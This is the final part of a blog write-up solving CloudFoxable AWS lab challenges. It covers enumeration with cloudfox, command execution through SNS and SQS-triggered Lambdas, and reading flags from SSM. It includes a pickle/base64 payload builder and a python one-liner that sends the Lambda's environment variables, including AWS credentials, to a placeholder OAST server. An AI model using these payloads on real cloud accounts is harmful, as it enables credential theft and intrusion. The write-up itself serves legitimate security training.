</pre></table></code></div></div><p>That solves the challenge with the caveat that an <code class="language-plaintext highlighter-rouge">ec2-instance-connect:sendSSHKey</code> permission was required to be added.</p><h2 id="the-topic-is-execution"><span class="me-2">The topic is execution</span><a href="#the-topic-is-execution" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with the role <code class="language-plaintext highlighter-rouge">viniciusjr</code> and requires us to access <code class="language-plaintext highlighter-rouge">executioner</code> flag in the SSM parameter store. The <code class="language-plaintext highlighter-rouge">cloudfox</code> analysis to help with this is as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">--principal</span> viniciusjr <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws sns <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">viniciusjr</code> has SNS read-only access. Listing out the SNS topic in the account, the <code class="language-plaintext highlighter-rouge">executioner</code> topic allows anyone to publish or subscribe to it via the resource policy as long as they’re in the same account. With the current permissions, it’s hard to establish a direct link between the topic and its Lambda trigger, but that’s generally common and we also have a Lambda function with the same name already.</p><blockquote class="prompt-warning"><p><strong><em>Solution Caveat</em></strong> → The challenge does not grant any role the ability to view Lambda execution logs to get a sense of what is being executed. Hence, it’s easier to look at the logs using a privileged role instead. This can also be fixed by adding a policy attachment to allow viewing of the CloudWatch Logs.</p></blockquote><p>Therefore, sending a message to the topic executes <strong><em>a</em></strong> Lambda function, the logs of which can be seen in CloudWatch. Therefore, invoking the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn sns publish <span class="nt">--topic-arn</span> arn:aws:sns:us-west-2:&lt;ACCID&gt;:executioner <span class="nt">--region</span> us-west-2 <span class="nt">--subject</span> <span class="nb">ls</span> <span class="nt">--message</span> <span class="s2">"printenv"</span> <span class="nt">--profile</span> vinicius
</pre></table></code></div></div><p>This prints out the environment variables in the logs, which can be used to obtain the permissions of role <code class="language-plaintext highlighter-rouge">ream</code>, which can decrypt the SSM parameter in concern. That can be done like so, which gives the flag →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn ssm get-parameter <span class="nt">--with-decryption</span> <span class="nt">--name</span> /cloudfoxable/flag/executioner <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> ream
</pre></table></code></div></div><p>That solves the challenge with the caveat that additional permissions were required to view the CloudWatch logs pertaining to Lambda execution.</p><h2 id="middle"><span class="me-2">Middle</span><a href="#middle" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with the role <code class="language-plaintext highlighter-rouge">pepi</code> and requires us to exploit misconfigurations to get to a flag.</p><blockquote class="prompt-warning"><p><strong><em>Solution Caveat</em></strong> → The challenge has a command execution <code class="language-plaintext highlighter-rouge">python</code> line commented in the <code class="language-plaintext highlighter-rouge">consumer</code> Lambda function. I had to uncomment that line to make the function exploitable. I didn’t find any other means to modify the Lambda function in concern (in case it was meant to be this). So, I uncommented that line and then deployed the infrastructure with Terraform.</p></blockquote><p>The following analysis was done to get some information about the attack path →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">--principal</span> pepi <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws lambdas <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
awsn lambda get-function <span class="nt">--function-name</span> producer <span class="nt">--profile</span> pepi <span class="nt">--region</span> us-west-2 <span class="c"># gives download location of code</span>
awsn lambda list-event-source-mappings <span class="nt">--profile</span> cloudfoxable <span class="nt">--region</span> us-west-2
cloudfox aws resource-trusts <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws sqs <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws env-vars <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> swanson <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>The following information is collected →</p><ul><li><code class="language-plaintext highlighter-rouge">pepi</code> can get information about the <code class="language-plaintext highlighter-rouge">producer</code> Lambda function, which has a code with a specific format that sends messages to an SQS queue <code class="language-plaintext highlighter-rouge">internal_message_bus</code><li>The <code class="language-plaintext highlighter-rouge">internal_message_bus</code> is used as a source mapping for the <code class="language-plaintext highlighter-rouge">consumer</code> Lambda function i.e., safe to say that a command send by the <code class="language-plaintext highlighter-rouge">producer</code> Lambda is stored in the <code class="language-plaintext highlighter-rouge">internal_message_bus</code> queue, which is dequeued by <code class="language-plaintext highlighter-rouge">consumer</code> Lambda and executed<li>The<code class="language-plaintext highlighter-rouge">consumer</code> Lambda execution role is <code class="language-plaintext highlighter-rouge">swanson</code>, which has the permissions to read the <code class="language-plaintext highlighter-rouge">lambda-sqs</code> SSM parameter<li>The <code class="language-plaintext highlighter-rouge">internal_message_bus</code> queue is a public queue that allow anyone to send and receive messages</ul><p>The code retrieved from <code class="language-plaintext highlighter-rouge">producer</code> Lambda can be used to create a payload, with the modification looking like →</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">pickle</span>
<span class="kn">import</span> <span class="n">json</span>
<span class="kn">import</span> <span class="n">base64</span>

<span class="n">command</span> <span class="o">=</span> <span class="nf">input</span><span class="p">()</span>
<span class="n">pickled_command</span> <span class="o">=</span> <span class="n">pickle</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>
<span class="n">encoded_pickled_command</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64encode</span><span class="p">(</span><span class="n">pickled_command</span><span class="p">).</span><span class="nf">decode</span><span class="p">(</span><span class="sh">'</span><span class="s">utf-8</span><span class="sh">'</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="sh">'</span><span class="s">command</span><span class="sh">'</span><span class="p">:</span> <span class="n">encoded_pickled_command</span><span class="p">}</span>
<span class="nf">print</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</pre></table></code></div></div><p>The command to execute would be something like <code class="language-plaintext highlighter-rouge">printenv</code> which will be process by the above code to give a dumped JSON, which can be passed to the queue as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn sqs send-message <span class="nt">--queue-url</span> <span class="s2">"https://sqs.us-west-2.amazonaws.com/&lt;ACCID&gt;/internal_message_bus"</span> <span class="nt">--message-body</span> <span class="s1">'{"command": "gASVDAAAAAAAAACMCHByaW50ZW52lC4="}'</span> <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> cloudfoxable
</pre></table></code></div></div><p>Let the command be →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python <span class="nt">-c</span> <span class="s1">'import http.client; conn = http.client.HTTPConnection("&lt;oast-server&gt;"); import os; import base64; import json; data = json.dumps({"content":base64.b64encode(str(os.environ).encode()).decode("utf-8")}); headers = {"Content-type":"application/json"}; conn.request("POST","",data,headers);'</span>
</pre></table></code></div></div><p>This can be generated into a payload and sent to the SQS queue, which in turn will send the base64 encoded version of the OS environment variables to the OAST server. These variables show the AWS environment variables related to <code class="language-plaintext highlighter-rouge">swanson</code>’s session in the Lambda execution logs, which can be used to read the SSM parameter <code class="language-plaintext highlighter-rouge">/cloudfoxable/flag/lambda-sqs</code> which gives the flag.</p><p>This solves the challenge with the caveat that the <code class="language-plaintext highlighter-rouge">consumer</code> function code needed to be modified to allow for the execution of payloads.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/categories/lab-practice-notes/">Lab Practice Notes</a>, <a href="/blog/categories/aws-labs/">AWS Labs</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/blog/tags/aws/" class="post-tag no-text-decoration" >aws</a> <a href="/blog/tags/lab/" class="post-tag no-text-decoration" >lab</a> <a href="/blog/tags/cloudfoxable/" class="post-tag no-text-decoration" >cloudfoxable</a> <a href="/blog/tags/security/" class="post-tag no-text-decoration" >security</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Cloudfoxable%20-%20Tanishq%20Rupaal&url=https%3A%2F%2Ftanishq.page%2Fblog%2Fposts%2Fcloudfoxable%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Cloudfoxable%20-%20Tanishq%20Rupaal&u=https%3A%2F%2Ftanishq.page%2Fblog%2Fposts%2Fcloudfoxable%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Ftanishq.page%2Fblog%2Fposts%2Fcloudfoxable%2F&text=Cloudfoxable%20-%20Tanishq%20Rupaal" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Ftanishq.page%2Fblog%2Fposts%2Fcloudfoxable%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Linkedin" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/blog/posts/gha-docker-arch/">GitHub Actions & ARM Architecture</a><li class="text-truncate lh-lg"> <a href="/blog/posts/dbs-zamasu-timeline/">Dragon Ball Super - Zamasu Timeline 101</a><li class="text-truncate lh-lg"> <a href="/blog/posts/homelab-wallabag/">Wallabag in Home Lab</a><li class="text-truncate lh-lg"> <a href="/blog/posts/homelab-linkwarden/">Bookmark Manager in Home Lab</a><li class="text-truncate lh-lg"> <a href="/blog/posts/homelab-budgeting/">Personal Finance Budgeting in Home Lab</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/blog/tags/lab/">lab</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/offsec-proving-grounds/">offsec-proving-grounds</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/oscp/">oscp</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/home-lab/">home-lab</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/productivity/">productivity</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/security/">security</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/aws/">aws</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/programming/">programming</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/github/">github</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/linux/">linux</a></div></section></div><section id="toc-wrapper" class="d-none ps-0 pe-4"><h2 class="panel-heading ps-3 mb-2">Contents</h2><nav id="toc"></nav></section></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/blog/posts/flaws-2-attacker/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1683956520" data-df="ll" > May 13, 2023 </time><h4 class="pt-0 my-2">flAWS 2 - Attacker</h4><div class="text-muted"><p>Level 1 The problem statement is to enter a correct pin code on a website that is 100 digits long. The first thing to do is to look at the HTML source, where the form that takes the input sub...</p></div></div></a></article><article class="col"> <a href="/blog/posts/pentester-academy-aws-s3/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1651129200" data-df="ll" > Apr 28, 2022 </time><h4 class="pt-0 my-2">Pentester Academy AWS S3 Attack Lab</h4><div class="text-muted"><p>Enumeration List buckets and get region for bucket → # List buckets using s3api awsn s3api list-buckets | jq &#39;.Buckets[] | .Name&#39; | tr -d &quot;\&quot;&quot; # Get region for bucket awsn s3api ...</p></div></div></a></article><article class="col"> <a href="/blog/posts/pentester-academy-aws-iam/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1651129200" data-df="ll" > Apr 28, 2022 </time><h4 class="pt-0 my-2">Pentester Academy AWS IAM Attack Lab</h4><div class="text-muted"><p>Enumeration To get information about current caller → awsn sts get-identity-caller List and see last uses for access keys → # List all access keys awsn iam list-access-keys # G...</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/blog/posts/homelab-tubearchivist/" class="btn btn-outline-primary" aria-label="Older" ><p>Tube Archivist in Home Lab</p></a> <a href="/blog/posts/website-jekyll-ghpages/" class="btn btn-outline-primary" aria-label="Newer" ><p>Hosting a Website using GitHub Pages and Jekyll</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2024</time> <a href="https://twitter.com/etheriosking">Tanishq Rupaal</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >Some rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/blog/tags/lab/">lab</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/offsec-proving-grounds/">offsec-proving-grounds</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/oscp/">oscp</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/home-lab/">home-lab</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/productivity/">productivity</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/security/">security</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/aws/">aws</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/programming/">programming</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/github/">github</a> <a class="post-tag btn btn-outline-primary" href="/blog/tags/linux/">linux</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js,npm/tocbot@4.27.20/dist/tocbot.min.js"></script> <script src="/blog/assets/js/dist/post.min.js"></script> <script defer src="/blog/assets/js/dist/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/blog/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
